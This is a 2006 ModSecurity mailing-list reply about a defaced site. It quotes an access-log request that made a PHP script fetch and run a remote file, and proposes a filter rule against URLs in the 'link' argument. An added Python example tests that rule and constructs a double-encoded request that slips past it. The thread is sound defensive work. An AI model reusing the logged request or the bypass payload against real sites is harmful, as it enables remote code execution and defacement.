[Modsecurity] New downloadable exploit

Mike Cardwell modsecurity at blubbernet.com
Thu Apr 20 07:43:00 EDT 2006


* on the Thu, Apr 20, 2006 at 12:00:52AM -0400, Michael S. wrote:

> One of our user sites was hacked on April 4th. It seems they used this
> command to do it.
> 
> 195.239.108.61 www.site.com - [04/Apr/2006:12:16:38 -0400] "GET /rapidpro51.php?link=http%3A%2F%2Fwww.megaupload.com%2Fru%2F%3Fd%3DD6DOKVCP&comment=&email=&method=tc&partSize=10&proxy=&path=%2Fhome%2Fstitadd4%2Fpublic_html%2Fimages%2Fdvd HTTP/1.1" 200 12933 "http://www.site.com.com/rapidpro51.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "hotlog=1"
> 
> Notice the 200 status? Is there a rule to stop this?

The question to ask is, what is bad about the format of the request? E.g.,
should the value of the "link" arg be allowed to be a URL? If not, then
you can filter on something like the following:

SecFilterSelective ARG_link "^(ht|f)tps?://"

Note, using that rule might break the functionality of the script. But
being as I don't know what package it is, or if it was a custom written
script etc, I can't tell what are safe inputs in order to write a valid
filter.

> This is a shell script that was downloaded to the user's website then
> executed to deface the site. They were unable to do anything.

They could modify the code to not execute arbitrary remote files ...

Mike

-- 
Digital photo printing: http://www.fotoserve.com/
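The following is an added example, not part of the original thread, showing what Mike's proposed rule would do when applied to the log line from the post. It pulls the request target out of an Apache combined-log entry, URL-decodes the query string once (ModSecurity is assumed to match against the decoded value), and tests ARG_link against the same regex. The benign and double-encoded lines are constructed here for contrast; the hypothetical helper names (request_args, rule_matches) are mine.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Mike's rule, SecFilterSelective ARG_link "^(ht|f)tps?://", as a Python regex.
# IGNORECASE is an addition here so an uppercase "HTTP://" is not a trivial bypass.
LINK_RULE = re.compile(r"^(ht|f)tps?://", re.IGNORECASE)

# The log line quoted in the post, re-joined onto one line.
ATTACK_LOG = (
    '195.239.108.61 www.site.com - [04/Apr/2006:12:16:38 -0400] '
    '"GET /rapidpro51.php?link=http%3A%2F%2Fwww.megaupload.com%2Fru%2F%3Fd%3DD6DOKVCP'
    '&comment=&email=&method=tc&partSize=10&proxy='
    '&path=%2Fhome%2Fstitadd4%2Fpublic_html%2Fimages%2Fdvd HTTP/1.1" 200 12933 '
    '"http://www.site.com.com/rapidpro51.php" '
    '"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "hotlog=1"'
)

# Constructed: a request whose "link" is a bare identifier, not a URL.
BENIGN_LOG = (
    '10.0.0.5 www.site.com - [04/Apr/2006:12:20:01 -0400] '
    '"GET /rapidpro51.php?link=D6DOKVCP&method=tc HTTP/1.1" 200 512 "-" "Mozilla/5.0" "-"'
)

# Constructed: the "h" of http is double-encoded (%25 -> %, then %68 -> h).
# One round of decoding yields "%68ttp://...", which the rule does not match.
DOUBLE_ENCODED_LOG = (
    '10.0.0.6 www.site.com - [04/Apr/2006:12:21:09 -0400] '
    '"GET /rapidpro51.php?link=%2568ttp%3A%2F%2Fwww.example.com%2Fx&method=tc HTTP/1.1" '
    '200 512 "-" "Mozilla/5.0" "-"'
)

# Extracts the request line: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/\d\.\d"')


def request_args(log_line):
    """Return the query arguments of the logged request, percent-decoded once."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return {}
    query = urlsplit(m.group("target")).query
    return dict(parse_qsl(query, keep_blank_values=True))


def rule_matches(log_line):
    """Apply the ARG_link rule; return the offending decoded value, or None."""
    link = request_args(log_line).get("link")
    if link is None:
        return None
    return link if LINK_RULE.match(link) else None


if __name__ == "__main__":
    for name, line in [("attack", ATTACK_LOG), ("benign", BENIGN_LOG),
                       ("double-encoded", DOUBLE_ENCODED_LOG)]:
        hit = rule_matches(line)
        print(f"{name:15s} -> {'BLOCK ' + repr(hit) if hit else 'pass'}")
```

With the rule in place the first request would have been rejected instead of returning the 200 seen in the log. The third line is the caveat: a single decoding pass (which is what the rule sees) leaves `%68ttp://` untouched, so if the PHP script decodes its input a second time the filter is bypassed. That is why Mike's real recommendation is to fix the script so it never fetches and runs remote files at all; the filter is only a stopgap, and only if the script genuinely never needs a URL in "link".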
